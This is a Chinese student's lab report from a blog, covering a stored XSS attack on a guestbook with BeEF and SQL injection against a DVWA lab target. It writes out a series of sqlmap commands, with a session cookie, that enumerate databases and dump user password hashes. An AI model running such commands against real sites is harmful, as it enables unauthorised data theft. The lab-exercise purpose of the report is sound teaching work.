菜鸡的第三次实验

最新推荐文章于 2022-01-24 18:45:36 发布
最新推荐文章于 2022-01-24 18:45:36 发布
阅读量223 收藏
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47041685/article/details/110622622
版权

实验三 XSS和SQL注入
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。
系统环境:Kali Linux 2、Windows Server
网络环境:交换网络结构
实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA
XSS部分:利用Beef劫持被攻击者客户端浏览器。
实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。
1.什么是XSS
XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
(剩下的介绍我怕会审核不过,想看的给我留言)进入正题
2.利用AWVS扫描留言簿网站,发现其存在XSS漏洞

在这里插入图片描述
3. Kali使用beef生成恶意代码
在这里插入图片描述
这里的ip是你虚拟机的ip地址
4.访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板

(见上图)

5.管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页。
在虚拟机打开网站首页
在这里插入图片描述
查看beef中的 online Browsers 出现一个目标浏览器,并进行相关操作
在这里插入图片描述
结果如下:
在这里插入图片描述
5.实验中XSS攻击属于哪种类型?
储存型xss攻击
SQL注入部分:DVWA+SQLmap+Mysql注入
实验环境搭建。启动Metasploitable2虚拟机。
利用nmap -p80 --script http-auth-finder 靶机地址打开dvwa网站
按下F12,在控制台输入document.cookie即可获取cookie值
1、注入点发现。首先肯定是要判断是否有注入漏洞。
在这里插入图片描述
在这里插入图片描述
2.枚举当前使用的数据库名称和用户名
命令:sqlmap -u “http://192.168.43.155/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#” --cookie=‘security=low; PHPSESSID=f827bec206lecd4b7d7517a3411a1357’-b --current-db --current-user
在这里插入图片描述
3.枚举数据库用户名和密码
命令:sqlmap -u “http://192.168.43.155/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#” --cookie=‘security=low; PHPSESSID=f827bec206lecd4b7d7517a3411a1357’ --users --password在这里插入图片描述
4、枚举数据库
命令:sqlmap -u “http://192.168.43.155/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#” --cookie=‘security=low; PHPSESSID=f827bec206lecd4b7d7517a3411a1357’ --dbs
在这里插入图片描述
5、枚举数据库和指定数据库的数据表
命令:sqlmap -u “http://192.168.43.155/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#” --cookie=‘security=low; PHPSESSID=f827bec206lecd4b7d7517a3411a1357’ -D dvwa --tables
在这里插入图片描述
6、获取指定数据库和表中所有列的信息
命令:sqlmap -u “http://192.168.43.155/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#” --cookie=‘security=low; PHPSESSID=f827bec206lecd4b7d7517a3411a1357’ -D dvwa -T users --columns
在这里插入图片描述
7、枚举指定数据表中的所有用户名与密码,并down到本地
命令:sqlmap -u “http://192.168.43.155/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#” --cookie=‘security=low; PHPSESSID=f827bec206lecd4b7d7517a3411a1357’ -D dvwa -T users -C user,password --dump
在这里插入图片描述
在虚拟机打开文件,取消隐藏,打开对应文件即可查看
在这里插入图片描述
在这里插入图片描述
实验小结:
这次实验我感觉大多数还是验证性的实验,除了第一题的beef之外,当时在弄的时候没有在online那找到对应的网站,它一直在off的那一行,导致无法跳转目标网站,不得不说,劫持辛酸,第二题的sql注入其实还好,按步骤来就好了,就那个隐藏文件需要思考一下,冲冲冲!

20231912范润椿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
计算机组成原理实验实验报告免费下载(我是菜鸡)
06-12
就是应付一下老师的作业,没有研究与分析,不懂理论就是按讲解来做实验
kali漏洞利用之BeeF
The__Apollo的博客
04-22 5810
对XSS漏洞往往需要一个强大的框架支持,如网络上的XSS平台,在KALI下,Beef是一款丝毫不逊于XSS平台的工具。Beef是浏览器攻击框架的简称,是一款专注于浏览器的渗透测试工具。打开beefbeef-xss 默认用户名和密码分别为beef/beef 假设被测试主机由于XSS漏洞请求到下面这个页面 这时候可以看到,online browsers就多了一项127.0.0.1
beef-xss的部分模块使用
olddocument的博客
01-24 2727
安装beef-xss sudo apt-get install beef-xss 启动 beef-xss 启动后可以在终端看见需要输入的脚本 为kali的ip地址 回到kali可以发现连接上了 online browers 在线浏览器 offline browers 离线浏览器 Detials 浏览器、插件版本信息,操作系统信息 Logs 浏览器动作:焦点变化,鼠标单击,信息输入 commands 绿色模块:表示模块适用当前用户,并且执行结果对用户不可见 红色模块:表示模块不适用当前用户,有些红色模
网络渗透试验(三)
qq_48489570的博客
12-01 541
实验目的 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境 Kali Linux 2、Windows Server 网络环境 交换网络结构 实验工具 Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤 XSS部分:利用Beef劫持被攻击者客户端浏览器。 角色:留言簿网站。存在
网络渗透实验
wow_iamfree的博客
11-01 419
文章目录一、利用搜索引擎被动扫描1.1搜索麻省理工学院网站含“network security” 的pdf文档1.2搜索照片中的地址信息1.3手机定位1.4base64解码1.5 地址信息1.5.1 mac:98-CA-33-02-27-B5访问202.193.64.341.5.2 比较https://whatismyipaddress.com得到ip与ping自己主机的区别二 NMAP使用2.1 nmap扫描metasploitable2端口开放情况2.2扫描操作系统2.3爆破dvwa登陆账号和密码2.4
Sql获取当前用户可以访问的数据库名
weixin_30905981的博客
10-22 219
create proc sp_EnumDatabasesasbegin   create table ##tt1(dbname varchar(500))   exec sp_msforeachdb "insert into ##tt1 select '?' dbname "   select * from ##tt1 DROP TABLE ##tt1end 转载于:https://www.c...
E01814104王佳琦200505_第3次实验.circ
05-19
华中科技大学机组实验/运算器设计/菜鸡做的,请多包涵/希望对您有帮助/已经测试,在网站上可全部通关/
计算机组成原理实验报告三
06-13
计组实验三 寄存器堆实现
计算机组成原理实验报告二
06-13
计算机组成原理实验报告 定点乘法
PGRGame菜鸡版.zip
03-28
在这个游戏项目中,可能包含了用于图形渲染、音频处理或者其他游戏功能的第三方库。 基于以上分析,我们可以得出以下知识点: 1. **Java编程**:整个项目是使用Java语言开发的,Java以其跨平台性和丰富的类库在...
nmap常用命令与进阶教程
weixin_44912169的博客
04-22 896
nmap常用命令 nmap是探查计算机网络和服务的安全扫描工具,是枚举和测试网络的强大工具,结合他丰富的NSE(nmap script engine)脚本使他变得不再普通 基本参数 用法: nmap [Scan Type(s)] [Options] {target specification} -p 扫描指定端口 -sS 使用SYN半开扫描 -sn 使用ping扫描,用于主机发现 -Pn...
kali web网站扫描
weixin_49071539的博客
11-18 9133
步骤 扫描映射web信息 cewl www.xxx.com 扫描网站服务器信息(对http协议可用) whatweb www.xxx.com 根据上面扫描的IP地址进行漏洞扫描,扫描开放的端口 nmap xxx.xxx.xxx.xxx -v
centos7安装jdk1.8新
07-08
centos7安装jdk1.8
2024年东南亚防火门市场深度研究及预测报告.pdf
07-08
东南亚位于我国倡导推进的“一带一路”海陆交汇地带,作为当今全球发展最为迅速的地区之一,近年来区域内生产总值实现了显著且稳定的增长。根据东盟主要经济体公布的最新数据,印度尼西亚2023年国内生产总值(GDP)增长5.05%;越南2023年经济增长5.05%;马来西亚2023年经济增速为3.7%;泰国2023年经济增长1.9%;新加坡2023年经济增长1.1%;柬埔寨2023年经济增速预计为5.6%。 东盟国家在“一带一路”沿线国家中的总体GDP经济规模、贸易总额与国外直接投资均为最大,因此有着举足轻重的地位和作用。当前,东盟与中国已互相成为双方最大的交易伙伴。中国-东盟贸易总额已从2013年的443亿元增长至 2023年合计超逾6.4万亿元,占中国外贸总值的15.4%。在过去20余年中,东盟国家不断在全球多变的格局里面临挑战并寻求机遇。2023东盟国家主要经济体受到国内消费、国外投资、货币政策、旅游业复苏、和大宗商品出口价企稳等方面的提振,经济显现出稳步增长态势和强韧性的潜能。 本调研报告旨在深度挖掘东南亚市场的增长潜力与发展机会,分析东南亚市场竞争态势、销售模式、客户偏好、整体市场营商环境,为国内企业出海开展业务提供客观参考意见。 本文核心内容: 市场空间:全球行业市场空间、东南亚市场发展空间。 竞争态势:全球份额,东南亚市场企业份额。 销售模式:东南亚市场销售模式、本地代理商 客户情况:东南亚本地客户及偏好分析 营商环境:东南亚营商环境分析 本文纳入的企业包括国外及印尼本土企业,以及相关上下游企业等,部分名单 QYResearch是全球知名的大型咨询公司,行业涵盖各高科技行业产业链细分市场,横跨如半导体产业链(半导体设备及零部件、半导体材料、集成电路、制造、封测、分立器件、传感器、光电器件)、光伏产业链(设备、硅料/硅片、电池片、组件、辅料支架、逆变器、电站终端)、新能源汽车产业链(动力电池及材料、电驱电控、汽车半导体/电子、整车、充电桩)、通信产业链(通信系统设备、终端设备、电子元器件、射频前端、光模块、4G/5G/6G、宽带、IoT、数字经济、AI)、先进材料产业链(金属材料、高分子材料、陶瓷材料、纳米材料等)、机械制造产业链(数控机床、工程机械、电气机械、3C自动化、工业机器人、激光、工控、无人机)、食品药品、医疗器械、农业等。邮箱:market@qyresearch.com
赚积分午点爬虫,我也没太看懂
07-08
赚积分午点爬虫,我也没太看懂
右键菜单功能实现.html
07-08
html+js+css实现 右键菜单功能
手机 App 测试.xmind
最新发布
07-08
手机 App 测试.xmind
Java软件开发实战 Java基础与案例开发详解 10-8 自定义异常类 共5页.pdf
07-07
完整版:https://download.csdn.net/download/qq_27595745/89522468 【课程大纲】 1-1 什么是java 1-2 认识java语言 1-3 java平台的体系结构 1-4 java SE环境安装和配置 2-1 java程序简介 2-2 计算机中的程序 2-3 java程序 2-4 java类库组织结构和文档 2-5 java虚拟机简介 2-6 java的垃圾回收器 2-7 java上机练习 3-1 java语言基础入门 3-2 数据的分类 3-3 标识符、关键字和常量 3-4 运算符 3-5 表达式 3-6 顺序结构和选择结构 3-7 循环语句 3-8 跳转语句 3-9 MyEclipse工具介绍 3-10 java基础知识章节练习 4-1 一维数组 4-2 数组应用 4-3 多维数组 4-4 排序算法 4-5 增强for循环 4-6 数组和排序算法章节练习 5-0 抽象和封装 5-1 面向过程的设计思想 5-2 面向对象的设计思想 5-3 抽象 5-4 封装 5-5 属性 5-6 方法的定义 5-7 this关键字 5-8 javaBean 5-9 包 package 5-10 抽象和封装章节练习 6-0 继承和多态 6-1 继承 6-2 object类 6-3 多态 6-4 访问修饰符 6-5 static修饰符 6-6 final修饰符 6-7 abstract修饰符 6-8 接口 6-9 继承和多态 章节练习 7-1 面向对象的分析与设计简介 7-2 对象模型建立 7-3 类之间的关系 7-4 软件的可维护与复用设计原则 7-5 面向对象的设计与分析 章节练习 8-1 内部类与包装器 8-2 对象包装器 8-3 装箱和拆箱 8-4 练习题 9-1 常用类介绍 9-2 StringBuffer和String Builder类 9-3 Rintime类的使用 9-4 日期类简介 9-5 java程序国际化的实现 9-6 Random类和Math类 9-7 枚举 9-8 练习题 10-1 java异常处理 10-2 认识异常 10-3 使用try和catch捕获异常 10-4 使用throw和throws引发异常 10-5 finally关键字 10-6 getMessage和printStackTrace方法 10-7 异常分类 10-8 自定义异常类 10-9 练习题 11-1 Java集合框架和泛型机制 11-2 Collection接口 11-3 Set接口实现类 11-4 List接口实现类 11-5 Map接口 11-6 Collections类 11-7 泛型概述 11-8 练习题 12-1 多线程 12-2 线程的生命周期 12-3 线程的调度和优先级 12-4 线程的同步 12-5 集合类的同步问题 12-6 用Timer类调度任务 12-7 练习题 13-1 Java IO 13-2 Java IO原理 13-3 流类的结构 13-4 文件流 13-5 缓冲流 13-6 转换流 13-7 数据流 13-8 打印流 13-9 对象流 13-10 随机存取文件流 13-11 zip文件流 13-12 练习题 14-1 图形用户界面设计 14-2 事件处理机制 14-3 AWT常用组件 14-4 swing简介 14-5 可视化开发swing组件 14-6 声音的播放和处理 14-7 2D图形的绘制 14-8 练习题 15-1 反射 15-2 使用Java反射机制 15-3 反射与动态代理 15-4 练习题 16-1 Java标注 16-2 JDK内置的基本标注类型 16-3 自定义标注类型 16-4 对标注进行标注 16-5 利用反射获取标注信息 16-6 练习题 17-1 顶目实战1-单机版五子棋游戏 17-2 总体设计 17-3 代码实现 17-4 程序的运行与发布 17-5 手动生成可执行JAR文件 17-6 练习题 18-1 Java数据库编程 18-2 JDBC类和接口 18-3 JDBC操作SQL 18-4 JDBC基本示例 18-5 JDBC应用示例 18-6 练习题 19-1 。。。
算法笔记-泛型算法题.md
07-07
泛型算法.md
菜鸡mac地址扫描器
12-30
菜鸡MAC地址扫描器是一种针对局域网中的网络设备进行扫描的工具。它的主要功能是识别和展示网络中各个设备的MAC地址。 菜鸡MAC地址扫描器相对于其他高级的网络工具来说,功能相对简单,易于使用。它可以通过扫描...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值